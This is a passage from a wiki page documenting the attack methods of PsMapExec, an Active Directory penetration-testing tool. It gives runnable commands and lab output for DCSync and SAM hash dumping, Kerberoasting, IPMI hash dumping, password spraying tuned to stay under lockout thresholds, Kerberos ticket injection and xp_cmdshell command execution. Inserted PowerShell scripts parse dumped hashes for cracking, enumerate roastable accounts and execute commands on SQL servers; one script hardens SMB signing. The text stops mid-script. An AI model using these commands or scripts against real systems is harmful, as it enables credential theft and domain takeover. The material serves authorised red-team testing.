
01 ‐ Methods

The-Viper-One edited this page Jun 4, 2025 · 15 revisions

Overview

In the context of PsMapExec, methods refer to the various built-in functions that enable interaction with systems over specific protocols. Each method defines how PsMapExec performs a task. For instance, the SMB and WMI methods facilitate access checks and remote code execution using their respective protocols, the Spray method tells PsMapExec to conduct a credential spraying operation with the supplied arguments, and the LDAP method directs it to connect to a target LDAP server. PsMapExec supports a range of methods, each tailored for a different type of operation. Refer to the sections below for details on how to use each one effectively.


> Command Execution Methods

The following methods support command execution and running modules on target systems:

  • MSSQL
  • SMB
  • SessionHunter
  • WinRM
  • WMI

Authentication Types

When -Command and -Module are omitted, PsMapExec will simply check the provided or current user credentials against the specified target systems for administrative access over the specified method.

# Current user
PsMapExec [Method] -Targets All

# With Password
PsMapExec [Method] -Targets All -Username [Username] -Password [Password]

# With Hash
PsMapExec [Method] -Targets All -Username [Username] -Hash [NTLM/RC4/AES256]

# With Ticket
PsMapExec [Method] -Targets All -Ticket [doI.. OR Path to ticket file]

# Local Authentication (WMI and MSSQL only) (Password auth only)
PsMapExec WMI -Targets All -Username Administrator -Password Password -LocalAuth

Command Execution

All currently supported command execution methods support the -Command parameter. The command parameter can be appended to the above Authentication Types to execute given commands as a specified or current user.

PsMapExec [Method] -Targets All -Command "whoami"
PS > PsMapExec wmi -Targets All -Command "whoami"

WMI   10.10.10.5      SRV2012.security.local        Windows Server 2012 R2 Standard   [+] SUCCESS
security\moe

WMI   10.10.10.6      MSSQL02.security.local        Windows Server 2019 Standard      [+] SUCCESS
security\moe

Module Execution

All currently supported command execution methods support the -Module parameter. The module parameter can be appended to the Authentication Types to execute given modules as a specified or current user.

# Syntax example
PsMapExec [Method] -Targets All -Module [Module]
PS C:\Users\moe> PsMapExec smb -Targets "MSSQL*" -Module sam -ShowOutput

SMB   10.10.10.17     MSSQL01.security.local        Windows Server 2022 Standard      [+] SUCCESS
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
MSSQL_Admin:1000:aad3b435b51404eeaad3b435b51404ee:9bff06fe611486579fb74037890fda96:::

SMB   10.10.10.6      MSSQL02.security.local        Windows Server 2019 Standard      [+] SUCCESS
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::

 

 

> DCSync

Performs DCSync against specified Domain Controller(s). Output is stored in $pwd\PME\DCSync\DCSync_Full_Dump unless a specific user is targeted in which case data is stored in $pwd\PME\DCSync\DCSync_User_Dump

Primary Purpose: Remote DCSyncing and domain password analysis.

Usage

# Target a specific DC
PsMapExec dcsync -Targets DC01.security.local -ShowOutput

# Target all DCs (syncs every account from every DC; rarely necessary, noisy, and likely to be disallowed in a future release)
PsMapExec dcsync -Targets DCs -ShowOutput

 

Example Output

PS > PsMapExec dcsync -Targets DC01.security.local -ShowOutput

DCSync   10.10.10.100    DC01.security.local   Windows Server 2022 Standard   [+] SUCCESS

SECURITY-CA$::aad3b435b51404eeaad3b435b51404ee:6e0028f4965e20e922fde677e40f9831:::
krbtgt::aad3b435b51404eeaad3b435b51404ee:bca1f3ee9cb3b27da08a2d754fffff7d:::
WS-APPLOCKER$::aad3b435b51404eeaad3b435b51404ee:8d827964afd7526ebd1c9fddbd85f899:::
MSSQL02$::aad3b435b51404eeaad3b435b51404ee:b58cff1e40f33c061af24cd485a07f33:::
WS07$::aad3b435b51404eeaad3b435b51404ee:7ed1fcc31ab5610452604c4644b3c7e0:::
SRV2012$::aad3b435b51404eeaad3b435b51404ee:d167e284b82d44414b3eb49cab3c98db:::
Administrator::aad3b435b51404eeaad3b435b51404ee:602f5c34346bc946f9ac2c0922cd9ef6:::

Parsing Results

[*] Parsed NTDS files stored in C:\Users\moe\PME\DCSync\DCSync_Full_Dump

It is also possible to sync only a single user. When doing so, it is highly recommended to prefix the username with the domain NetBIOS name, as shown below.

PsMapExec dcsync -Targets DC01.security.local -option "dcsync:security\krbtgt" -ShowOutput

 

Example Output (Single User)

PS > PsMapExec dcsync -Targets DC01.security.local -option "dcsync:security\krbtgt" -ShowOutput

DCSync   10.10.10.100    DC01.security.local   Windows Server 2022 Standard   [+] SUCCESS

< -- Snip -->

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   : 
Password last change : 17/05/2025 11:36:26
Object Security ID   : S-1-5-21-1201573619-2117991115-2379797238-502
Object Relative ID   : 502

Credentials:
  Hash NtLm: bca1f3ee9cb3b27da08a2d754fffff7d
    ntlm- 0: bca1f3ee9cb3b27da08a2d754fffff7d
    lm  - 0: 327d0b3e9bd74fc308bef6164bd10393

< -- Snip -->
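Both the DCSync dump and the output of the sam module shown earlier are pwdump-style lines (user:rid:lm:nt:::), so the same parser serves both. The script below is an added example and not part of PsMapExec; it reads constructed lines modelled on the page's output (svc_backup and guest_acct are invented accounts), flags empty passwords and NT-hash reuse, and writes a hashcat mode 1000 input file. In practice, replace the inline sample with Get-Content on the files under $pwd\PME\DCSync or $pwd\PME\SMB.

```powershell
# Added example (not PsMapExec code): analyse pwdump-style lines as written by the
# DCSync method or the "sam" module. The input below is constructed from the page's
# example output; read the real files from $pwd\PME\DCSync\DCSync_Full_Dump instead.
$EmptyNt = '31d6cfe0d16ae931b73c59d7e0c089c0'   # NT hash of the empty password
$EmptyLm = 'aad3b435b51404eeaad3b435b51404ee'   # LM hash of the empty password (LM disabled)

$DumpLines = @'
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
MSSQL_Admin:1000:aad3b435b51404eeaad3b435b51404ee:9bff06fe611486579fb74037890fda96:::
svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
guest_acct:1106:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SRV2012$::aad3b435b51404eeaad3b435b51404ee:d167e284b82d44414b3eb49cab3c98db:::
'@ -split "`r?`n" | Where-Object { $_ -match ':' }

function ConvertFrom-PwdumpLine {
    param([string]$Line)
    # Format: user:rid:lm:nt:::  (the RID field is empty in DCSync output, as on this page)
    $parts = $Line.Split(':')
    if ($parts.Count -lt 4) { return }
    [pscustomobject]@{
        User      = $parts[0]
        Rid       = $parts[1]
        LM        = $parts[2].ToLower()
        NT        = $parts[3].ToLower()
        IsMachine = $parts[0].EndsWith('$')   # computer accounts are not worth cracking
    }
}

$Accounts = $DumpLines | ForEach-Object { ConvertFrom-PwdumpLine $_ }

# 1. Accounts whose NT hash is the hash of the empty password
$Accounts | Where-Object { $_.NT -eq $EmptyNt } |
    ForEach-Object { "[!] Empty password: $($_.User)" }

# 2. Accounts that still carry a real LM hash (LM storage enabled somewhere)
$Accounts | Where-Object { $_.LM -ne $EmptyLm } |
    ForEach-Object { "[!] LM hash present: $($_.User)" }

# 3. Password reuse: the same NT hash on more than one user account
$Accounts | Where-Object { -not $_.IsMachine } | Group-Object NT |
    Where-Object { $_.Count -gt 1 } |
    ForEach-Object { "[!] Shared NT hash $($_.Name): $($_.Group.User -join ', ')" }

# 4. Hashcat input (mode 1000, NTLM). Run with --username so the user column is kept.
$Accounts | Where-Object { -not $_.IsMachine -and $_.NT -ne $EmptyNt } |
    ForEach-Object { "$($_.User):$($_.NT)" } |
    Set-Content -Path (Join-Path $PWD 'ntlm_hashes.txt')
```

With the constructed input, step 1 reports guest_acct, step 2 reports nothing, and step 3 reports that Administrator and svc_backup share 58a478135a93ac3bf058a5ea0e8fdb71, which is the kind of reuse that turns one cracked service password into a domain admin password.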

 

 

> GenRelayList / SMB Signing

PsMapExec supports SMB signing checks to determine which specified targets have signing enabled.

Output for systems which do not require SMB signing will be stored in $pwd\PME\SMB\SigningNotRequired.txt

Primary Purpose: Identification of systems that do not require SMB signing (candidates for NTLM relay).

Usage

PsMapExec GenRelayList -Targets All

By default, the results are parsed and a list of hostnames are written to disk in the PME folder for all hosts which do not require signing.

Example Output

PS > PsMapExec GenRelayList -Targets All -Domain Security.local

GenRelayList   10.10.10.111    DC02.security.local           Windows Server 2019 Standard      [-] SMB Signing Required
GenRelayList   10.10.10.100    DC01.security.local           Windows Server 2022 Standard      [-] SMB Signing Required
GenRelayList   10.10.10.12     Security-CA.security.local    Windows Server 2019 Standard      [+] SMB Signing not Required
GenRelayList   10.10.10.6      MSSQL02.security.local        Windows Server 2019 Standard      [+] SMB Signing not Required
GenRelayList   10.10.10.5      SRV2012.security.local        Windows Server 2012 R2 Standard   [+] SMB Signing not Required
GenRelayList   10.10.10.17     MSSQL01.security.local        Windows Server 2022 Standard      [-] SMB Signing Required

Success Count    : 3
Script Completed : 08:18:34
Elapsed Time     : 00:00:01.2651776
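The list written to $pwd\PME\SMB\SigningNotRequired.txt is also the remediation list. The following script is an added example and not part of PsMapExec: it reads that file and, over WinRM, reports each host's server-side signing requirement and, with -Remediate, turns it on. It assumes administrative WinRM access to the hosts and that the SmbShare module (Get-SmbServerConfiguration, Set-SmbServerConfiguration) is present, which holds for Windows 8 / Server 2012 and later.

```powershell
# Added example (not PsMapExec code). Audits, and optionally fixes, the SMB server
# signing requirement on the hosts PsMapExec found not to require signing.
param(
    [string]$ListPath = (Join-Path $PWD 'PME\SMB\SigningNotRequired.txt'),
    [switch]$Remediate
)

$Hosts = Get-Content -Path $ListPath | Where-Object { $_.Trim() -ne '' }

foreach ($Target in $Hosts) {
    try {
        $Result = Invoke-Command -ComputerName $Target -ErrorAction Stop -ScriptBlock {
            param([bool]$Fix)
            # RequireSecuritySignature is the server-side "Digitally sign communications (always)" setting
            $Before = (Get-SmbServerConfiguration).RequireSecuritySignature
            if ($Fix -and -not $Before) {
                # Refuse unsigned SMB sessions from now on; existing sessions are not affected
                Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
            }
            [pscustomobject]@{
                RequiredBefore = $Before
                RequiredAfter  = (Get-SmbServerConfiguration).RequireSecuritySignature
            }
        } -ArgumentList $Remediate.IsPresent
        '{0,-30} signing required: {1} -> {2}' -f $Target, $Result.RequiredBefore, $Result.RequiredAfter
    }
    catch {
        '{0,-30} [-] {1}' -f $Target, $_.Exception.Message
    }
}
```

A local change made this way is overwritten at the next policy refresh if a GPO sets "Microsoft network server: Digitally sign communications (always)" to Disabled, so the durable fix is the GPO setting; the script is useful for confirming that the policy has actually landed on the hosts PsMapExec flagged. Re-running PsMapExec GenRelayList afterwards should move those hosts to "[-] SMB Signing Required".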

 

 

> Inject

A simple method, Inject is used to inject a kerberos ticket in memory. There are two primary reasons for performing this method:

  • You do not have any kerberos tickets already in memory, for example when working from a non-domain joined system
  • You wish to revert to different "credentials" after performing impersonation in PsMapExec

Primary Purpose: Changing current user context with various credential material (Rubeus ptt)

Usage

Ticket

A base64 encoded Kerberos ticket can be supplied to the -Ticket parameter either directly into the console or can be loaded from file.

PsMapExec Inject -Ticket "doIhsj..."
PsMapExec Inject -Ticket "C:\ticket.txt"

Username and Hash

A username and hash combination can also be provided for authentication. The following hashes are currently accepted:

  • RC4 / NT
  • NTLM
  • AES256 HMAC

PsMapExec Inject -Username [User] -Hash [Hash] -Domain [Domain]

Username and Password

Traditional username and password combination is also supported.

PsMapExec Inject -Username [User] -Password [Password] -Domain [Domain]

Example Output

PS > klist

Current LogonId is 0:0xb7ed6

#0>	Client: Moe @ SECURITY.LOCAL
	Server: krbtgt/SECURITY.LOCAL @ SECURITY.LOCAL
	KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
	Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize 
	Start Time: 5/23/2025 8:20:30 (local)
	End Time:   5/23/2025 18:20:30 (local)
	Renew Time: 5/30/2025 8:20:30 (local)
	Session Key Type: AES-256-CTS-HMAC-SHA1-96
	Cache Flags: 0x1 -> PRIMARY 
	Kdc Called: 


PS C:\Users\moe> PsMapExec inject -Username administrator -Password Password123!!

[+] Ticket Successfuly Injected

PS > klist

Current LogonId is 0:0xb7ed6

#0>	Client: Administrator @ SECURITY.LOCAL
	Server: krbtgt/SECURITY.LOCAL @ SECURITY.LOCAL
	KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
	Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize 
	Start Time: 5/23/2025 8:21:08 (local)
	End Time:   5/23/2025 18:21:08 (local)
	Renew Time: 5/30/2025 8:21:08 (local)
	Session Key Type: AES-256-CTS-HMAC-SHA1-96
	Cache Flags: 0x1 -> PRIMARY 
	Kdc Called: 

 

 

> IPMI

This method will attempt to dump password hashes from vulnerable IPMI servers. The weakness is in the IPMI 2.0 RAKP authentication exchange, which hands a salted HMAC of the user's password to any client that supplies a valid username, so the method only needs usernames to try. By default a built-in user list is used; alternatively, a user list can be queried from the domain, or a single username can be tried against each IPMI server.

Successful hash output is written to $PWD\PME\IPMI

Primary Purpose: IPMI hash dumping.

Usage

Standard targeting using the built in user list

PsMapExec IPMI -Targets [Targets]

Using a list of domain users as a user list, targeting all domain joined systems

PsMapExec IPMI -Targets All -Option IPMI:DomainUsers

Using a single username for authentication

PsMapExec IPMI -Targets All -Option IPMI:admin

 

 

> Kerberoast

This method will connect to the targeted domain and perform Kerberoasting on eligible accounts. Targeted, single-user roasting is also supported where required. Depending on the encryption type of the retrieved ticket, PsMapExec stores collected hashes in two separate files in hashcat format ready for password cracking (for example $krb5tgs$23$ for RC4 and $krb5tgs$18$ for AES256, cracked with hashcat modes 13100 and 19700 respectively).

Primary Purpose: Kerberoasting

Output is stored in: $PWD\PME\Kerberoast

Optional Parameters

| Parameter   | Value           | Description                                                   |
|-------------|-----------------|---------------------------------------------------------------|
| -Domain     | Domain          | Set the domain to run against                                 |
| -Option     | Kerberoast:USER | Specify a single user to roast rather than all candidate users |
| -ShowOutput | N/A             | Display hash output in the console                            |

 

Obtain all Kerberoastable users from target domain

PsMapExec kerberoast -Domain dev.security.local -ShowOutput

Example Output

PS > PsMapExec kerberoast -Domain dev.security.local -ShowOutput

[*] Found 2 roastable Users

User          : dev_user_1
SPN           : cifs/aLDM2NE6T7j58xUl.domain.com

$krb5tgs$23$*dev_user_1$dev.security.local$cifs/aLDM2NE6T7j58xUl.domain.com*$8CDDB07653F3D27A24395D00220D0798$5AE09881A4
DFE935E11F3A26D5C8A49766D135965B40DEE6525D8E6186058B70505096A94C05581218B739ACF05DD89A27DF7C9885E7255863CE6C4349D2FDD3FF
EE167259FF905A8292B30C12904BE9DB07E3E43192662A141010E02CD4A5468C957E7C60617D8CD7B33059718E7204F2186504EB3D604AF95A613E80

< -- Snip -->

User          : dev_user_2
SPN           : cifs/9Dl1TKMroOy2EtLN.domain.com

$krb5tgs$23$*dev_user_2$dev.security.local$cifs/9Dl1TKMroOy2EtLN.domain.com*$265787A4D7A2BBCF9D56D378501C5458$515A080C96
3FCCCBE5DC5F5DAEB9A92BE35E55BFF9DFE9F594C5DF2053350A393E7D2FCA3A3F1AADBBCB0A9A0B10C2C15ABAD9A3BE55FD7E128C2E6B5E883ED9C9
5CF0D68B4E2C24D84DCF61117E80611E3D85FBD63B95E013EEF03F8D4220E28A3497613AE4ABFC81AB5BEF6BD42E18DC4295BA37B231DCAC2989BD6F

< -- Snip -->

Single user specification

PsMapExec Kerberoast -Option "Kerberoast:USER" -ShowOutput

Example Output

PS > PsMapExec kerberoast -Domain dev.security.local -Option "Kerberoast:dev_user_1" -ShowOutput

[*] Found 1 roastable Users

User          : dev_user_1
SPN           : cifs/aLDM2NE6T7j58xUl.domain.com

$krb5tgs$23$*dev_user_1$dev.security.local$cifs/aLDM2NE6T7j58xUl.domain.com*$8CDDB07653F3D27A24395D00220D0798$5AE09881A4
DFE935E11F3A26D5C8A49766D135965B40DEE6525D8E6186058B70505096A94C05581218B739ACF05DD89A27DF7C9885E7255863CE6C4349D2FDD3FF
8E405CEFCB72F37A4B3BCF5070F651A9E0F036EFC90C710082F655B826C69DAD6B6CD03E9CE580799162A13DE60346A3158241225705F9C34B7158F4

< -- Snip -->
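The text above leaves "eligible accounts" implicit. The script below is an added example, not PsMapExec code, that enumerates the candidates with the same LDAP criteria Kerberoasting tools generally use (enabled user objects with a servicePrincipalName, excluding krbtgt) and classifies each by the encryption type a ticket request would get, which is what decides the hash prefix and hashcat mode noted above. It uses only System.DirectoryServices and runs as the current domain user; the -Domain parameter and the assumption that an unset msDS-SupportedEncryptionTypes means RC4 is still allowed are the author's, not the project's.

```powershell
# Added example (not PsMapExec code): list Kerberoastable accounts and the hash type
# to expect from each. Omit -Domain to use the current domain.
param([string]$Domain)

$Root = if ($Domain) { [ADSI]"LDAP://$Domain" } else { [ADSI]'' }

# User objects (samAccountType 805306368) with an SPN, enabled (UAC bit 2 clear), not krbtgt
$Filter = '(&(samAccountType=805306368)(servicePrincipalName=*)' +
          '(!(samAccountName=krbtgt))(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'
$Searcher = New-Object System.DirectoryServices.DirectorySearcher($Root, $Filter)
$Searcher.PageSize = 500
[void]$Searcher.PropertiesToLoad.AddRange(@('samaccountname', 'serviceprincipalname',
    'pwdlastset', 'msds-supportedencryptiontypes', 'memberof'))

foreach ($R in $Searcher.FindAll()) {
    $P = $R.Properties
    # msDS-SupportedEncryptionTypes bit flags: 0x4 RC4, 0x8 AES128, 0x10 AES256.
    # Assumption: an unset value (0) means the KDC still issues RC4 tickets for the account.
    $Etypes = if ($P['msds-supportedencryptiontypes'].Count) { [int]$P['msds-supportedencryptiontypes'][0] } else { 0 }
    $Class = if (($Etypes -band 0x4) -or $Etypes -eq 0) { 'RC4 ($krb5tgs$23$, hashcat 13100)' }
             elseif ($Etypes -band 0x10) { 'AES256 ($krb5tgs$18$, hashcat 19700)' }
             elseif ($Etypes -band 0x8)  { 'AES128 ($krb5tgs$17$, hashcat 19600)' }
             else { "Unknown ($Etypes)" }
    $PwdSet = if ($P['pwdlastset'].Count) { [DateTime]::FromFileTimeUtc([long]$P['pwdlastset'][0]) } else { $null }
    [pscustomobject]@{
        User        = $P['samaccountname'][0]
        SPN         = $P['serviceprincipalname'][0]
        Encryption  = $Class
        PwdLastSet  = $PwdSet     # service accounts with years-old passwords are the usual cracking wins
        AdminGroups = @($P['memberof'] | Where-Object { $_ -match 'CN=(Domain|Enterprise) Admins' }).Count
    }
}
```

Accounts that report AES256 only are still roastable, but the hash is far slower to crack, so prioritise RC4-capable accounts with old passwords and privileged group memberships. Note that the enumeration itself is a plain LDAP query and generates no Kerberos traffic; it is the subsequent TGS requests (event ID 4769 with RC4 encryption type 0x17) that defenders alert on.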

 

 

> LDAP / LDAPS

This method is used for performing authentication to LDAP servers. Refer to the Modules page for in depth usage on what can be executed on LDAP servers.

Primary Purpose: Authentication and LDAP based abuse vectors.

Usage

Note: Use "LDAP" as the method name when unencrypted LDAP connections to port 389 are required. Otherwise it is recommended to use "LDAPS", which connects to port 636 for encrypted communication.

Simply check current user authentication to LDAP

# Check authentication with current user credentials
PsMapExec LDAP -Targets DC01

# Execute modules as current user
PsMapExec LDAP -Targets DC01 -Module [Module]

# Check authentication with alternate credentials
PsMapExec LDAP -Targets DC01 -Username Moe -Password Password123

# Check authentication with alternate hash
PsMapExec LDAP -Targets DC01 -Username Moe -Hash 602F5C34346BC946F9AC2C0922CD9EF6

# Check authentication with alternate credentials (ticket) against all Domain Controllers over LDAPS
PsMapExec LDAPS -Targets DCs -Ticket doIF+DCCBfSgAwIBBaEDA...

 

 

> MSSQL

The MSSQL method identifies MSSQL servers within the targeted domain and attempts to authenticate to each instance, either in the current user context (Windows authentication) or with provided local SQL Server login credentials. Command execution is supported on instances where the authenticated login is a sysadmin.

Primary Purpose: Command execution and access checking on MSSQL servers.

Usage

Authentication Types

The MSSQL method supports the following authentication types:

# Current user
PsMapExec MSSQL -Targets All

# Local Authentication (Authenticates through SQL Server login)
PsMapExec MSSQL -Targets All -Username SA -Password Password123 -LocalAuth

Status messages

Status messages are returned to the console to indicate what level of access we may have to a specified instance.

[+] ACCESSIBLE INSTANCE # The instance is accessible, without sysadmin rights
[-] ACCESS DENIED       # Access is denied to the instance
[+] SYSADMIN            # You are a sysadmin on the instance, try executing commands

Command Execution

If you have sysadmin rights you can supply the -Command parameter to PsMapExec. xp_cmdshell needs to be enabled to perform command execution; if it is not, PsMapExec will attempt to enable it, run the command, and then revert xp_cmdshell to its original state.

PsMapExec MSSQL -Targets All -Command "whoami"
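The status messages and the enable/run/revert cycle described above correspond to a handful of T-SQL calls. The script below is an added example, not PsMapExec code, that performs them against a single instance with System.Data.SqlClient and Windows authentication; the instance name is an assumption. It records both configuration values before touching them so the revert restores exactly what was found.

```powershell
# Added example (not PsMapExec code): access check and xp_cmdshell command execution
# with a guaranteed revert of the configuration. $Instance is an assumption.
param(
    [string]$Instance = 'MSSQL01.security.local',
    [string]$Command  = 'whoami'
)

function Invoke-Scalar($Conn, [string]$Sql) {
    $Cmd = $Conn.CreateCommand(); $Cmd.CommandText = $Sql
    return $Cmd.ExecuteScalar()
}
function Invoke-NonQuery($Conn, [string]$Sql) {
    $Cmd = $Conn.CreateCommand(); $Cmd.CommandText = $Sql
    [void]$Cmd.ExecuteNonQuery()
}

$Conn = New-Object System.Data.SqlClient.SqlConnection(
    "Server=$Instance;Integrated Security=SSPI;Connect Timeout=5;Encrypt=False")
try { $Conn.Open() }
catch { "[-] ACCESS DENIED       $Instance : $($_.Exception.Message)"; return }

# Same distinction as the PsMapExec status messages: any login vs. sysadmin
if ([int](Invoke-Scalar $Conn "SELECT IS_SRVROLEMEMBER('sysadmin')") -ne 1) {
    "[+] ACCESSIBLE INSTANCE $Instance (login $(Invoke-Scalar $Conn 'SELECT SYSTEM_USER'), not sysadmin)"
    $Conn.Close(); return
}
"[+] SYSADMIN            $Instance"

# Record the current state of both options so they can be put back afterwards
$ConfigSql = "SELECT CAST(value_in_use AS int) FROM sys.configurations WHERE name = '{0}'"
$AdvWasOn   = [int](Invoke-Scalar $Conn ($ConfigSql -f 'show advanced options'))
$WasEnabled = [int](Invoke-Scalar $Conn ($ConfigSql -f 'xp_cmdshell'))
try {
    if (-not $WasEnabled) {
        Invoke-NonQuery $Conn "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"
    }
    # Pass the command as a parameter rather than concatenating it into the statement
    $Cmd = $Conn.CreateCommand()
    $Cmd.CommandText = 'EXEC master..xp_cmdshell @c'
    [void]$Cmd.Parameters.AddWithValue('@c', $Command)
    $Reader = $Cmd.ExecuteReader()
    while ($Reader.Read()) { if (-not $Reader.IsDBNull(0)) { $Reader.GetString(0) } }
    $Reader.Close()
}
finally {
    # Revert to the original state, even if the command itself failed
    if (-not $WasEnabled) { Invoke-NonQuery $Conn "EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;" }
    if (-not $AdvWasOn)   { Invoke-NonQuery $Conn "EXEC sp_configure 'show advanced options', 0; RECONFIGURE;" }
    $Conn.Close()
}
```

The revert restores the configuration but does not remove the evidence: each sp_configure change is written to the SQL Server error log ("Configuration option 'xp_cmdshell' changed from 0 to 1"), and the command runs as the SQL Server service account, which is what the whoami output will show.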

 

 

> Session Hunter

PsMapExec supports Leo4j's Invoke-SessionHunter. The SessionHunter method identifies systems with privileged or administrative user sessions, checks whether the current or provided user credentials have administrative access, and, if so, continues with command execution.

This is an ideal method through which to filter target acquisition to isolate only the most pertinent targets.

Primary Purpose: Command execution on systems that are likely to contain sensitive account credentials

Usage

# Without command execution (Check Access)
PsMapExec SessionHunter -Targets [Targets]

# With command execution
PsMapExec SessionHunter -Targets [Targets] -Command "whoami"

# With modules
PsMapExec SessionHunter -Targets [Targets] -Module [Module]

 

 

> Spray

The spray method offers various credential spraying techniques. PsMapExec is designed to respect the domain's default account lockout threshold, helping to prevent user lockouts. However, it does not account for fine-grained password policies (FGPPs). It’s recommended to verify whether FGPPs are in use within the environment, as they could lead to unintended account lockouts during spraying.

Primary Purpose: Account validation through credential spraying
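The FGPP check recommended above can be done with plain ADSI before spraying. The script below is an added example and not part of PsMapExec: it reads the Default Domain Policy lockout values from the domain head (the values PsMapExec honours) and then lists every Password Settings Object, whose msDS-LockoutThreshold may be lower for the users and groups it applies to. The -Domain parameter is an assumption; omit it to use the current domain.

```powershell
# Added example (not PsMapExec code): compare the default lockout threshold with any
# fine-grained password policies before spraying.
param([string]$Domain)

$Root   = if ($Domain) { [ADSI]"LDAP://$Domain" } else { [ADSI]'' }
$RootDn = $Root.distinguishedName.ToString()

function ConvertFrom-AdInterval([long]$Value) {
    # AD stores durations as negative counts of 100 ns intervals
    if ($Value -eq 0) { return [TimeSpan]::Zero }
    [TimeSpan]::FromTicks(-1 * $Value)
}

# 1. Default Domain Policy values are replicated onto the domain head object
$DomainSearch = New-Object System.DirectoryServices.DirectorySearcher($Root, '(objectClass=domainDNS)')
$DomainSearch.SearchScope = 'Base'
$D = $DomainSearch.FindOne().Properties
[pscustomobject]@{
    Policy            = 'Default Domain Policy'
    Precedence        = $null
    LockoutThreshold  = [int]$D['lockoutthreshold'][0]          # 0 = accounts never lock out
    ObservationWindow = ConvertFrom-AdInterval $D['lockoutobservationwindow'][0]
    AppliesTo         = 'every user not covered by a PSO'
}

# 2. Fine-grained password policies. The container is readable only by admins by default,
#    so an access error or an empty result does not prove that no PSOs exist.
try {
    $PsoContainer = [ADSI]"LDAP://CN=Password Settings Container,CN=System,$RootDn"
    $PsoSearch = New-Object System.DirectoryServices.DirectorySearcher($PsoContainer, '(objectClass=msDS-PasswordSettings)')
    foreach ($R in $PsoSearch.FindAll()) {
        $P = $R.Properties
        [pscustomobject]@{
            Policy            = $P['name'][0]
            Precedence        = [int]$P['msds-passwordsettingsprecedence'][0]   # lowest value wins when several apply
            LockoutThreshold  = [int]$P['msds-lockoutthreshold'][0]
            ObservationWindow = ConvertFrom-AdInterval $P['msds-lockoutobservationwindow'][0]
            AppliesTo         = ($P['msds-psoappliesto'] -join '; ')
        }
    }
}
catch { "[-] Could not read the Password Settings Container: $($_.Exception.Message)" }
```

If a PSO with a lower threshold applies to accounts in your target set, either exclude those accounts from the list passed to -Targets or keep the number of passwords tried per observation window below that PSO's threshold, since PsMapExec's safety limit is derived from the default domain value only.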

Usage

Targets

When using the Spray method, the -Targets parameter is used to specify which accounts to perform password spraying on. If -Targets is not specified, all enabled user accounts in the targeted or current domain will be sprayed.

Other values for -Targets are supported; as shown below:

PsMapExec Spray -Domain Security.local                           # Sprays all users
PsMapExec Spray -Domain Security.local -Targets "All"            # Sprays all users
PsMapExec Spray -Domain Security.local -Targets "C:\Users.txt"   # Sprays users from list (SamAccountNames)
PsMapExec Spray -Domain Security.local -Targets "AdminCount=1"   # Sprays targets which have the attribute AdminCount=1
PsMapExec Spray -Domain Security.local -Targets "Group Name"     # Sprays members of group

Hash

Hash authentication supports NT, LM:NT and AES256 hashes

PsMapExec Spray -SprayHash [RC4]
PsMapExec Spray -SprayHash [AES256]
PsMapExec Spray -SprayHash [LM:NT]

Password

PsMapExec Spray -SprayPassword [Password]

AccountAsPassword

Sets the password to the username value.

PsMapExec Spray -AccountAsPassword

EmptyPassword

Authentication attempts are performed with empty password values.

PsMapExec Spray -EmptyPassword

Pre2k

Sprays for Pre2k computer accounts.

PsMapExec Spray -Pre2k

SuccessOnly

Displays only successful authentication attempts. This is recommended in large domains, as a large number of console writes slows PowerShell significantly.

PsMapExec Spray -SprayPassword [Password] -SuccessOnly

Example Output

PS > PsMapExec spray -domain security.local -SprayPassword Password123

 - Lockout Threshold  : 20
 - Safety Limit value : 18
 - Removed disabled accounts from spraying

[*] Spraying with password value: Password123

[-] security.local\Administrator
[+] security.local\Moe
[+] security.local\mendez
[+] security.local\yap-yap
[+] security.local\arbiter
[-] security.local\Foehammer
[-] security.local\NobleSix
[+] security.local\Protected


[*] Valid credential pairs 
 
[+] security.local\Moe
[+] security.local\mendez
[+] security.local\yap-yap
[+] security.local\arbiter
[+] security.local\Protected

[*] Output written to C:\Users\moe\PME\Spraying

> VNC

This method simply performs a "no auth" check on any identified VNC servers.

Primary Purpose: Checks for "no auth" on VNC servers

Usage

# Check for VNC no auth on all systems in the domain
PsMapExec VNC -Target all -Domain Security.local

Example Output

PS > PsMapExec vnc -Targets ALL -Domain security.local

VNC   10.10.10.27     MSSQL01.security.local       Windows Server 2022 Standard   [+] AUTH NOT REQUIRED
VNC   10.10.10.32     MSSQL02.security.local       Windows Server 2022 Standard   [-] AUTH REQUIRED
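The check itself is a partial RFB handshake: after the version exchange, an RFB 3.7 or 3.8 server lists the security types it accepts, and type 1 (None) means anyone can connect; an RFB 3.3 server instead dictates a single type. The function below is an added example and not PsMapExec code; it performs that exchange over a raw TCP socket and closes the connection before any authentication or framebuffer negotiation. The target address is an assumption taken from the page's example output.

```powershell
# Added example (not PsMapExec code): RFB security-type probe behind a VNC "no auth" check.
function Test-VncNoAuth {
    param([string]$Target, [int]$Port = 5900, [int]$TimeoutMs = 3000)
    $Client = New-Object System.Net.Sockets.TcpClient
    try {
        if (-not $Client.ConnectAsync($Target, $Port).Wait($TimeoutMs)) { return 'NO RESPONSE' }
        $Stream = $Client.GetStream(); $Stream.ReadTimeout = $TimeoutMs

        # Server speaks first with a 12-byte version string, e.g. "RFB 003.008\n"
        $Buf = New-Object byte[] 12
        if ($Stream.Read($Buf, 0, 12) -ne 12) { return 'NOT RFB' }
        $Version = [Text.Encoding]::ASCII.GetString($Buf)
        if ($Version -notmatch '^RFB (\d{3})\.(\d{3})') { return 'NOT RFB' }
        $Minor = [int]$Matches[2]

        # Echo the server's version back to agree on it
        $Stream.Write($Buf, 0, 12)

        if ($Minor -ge 7) {
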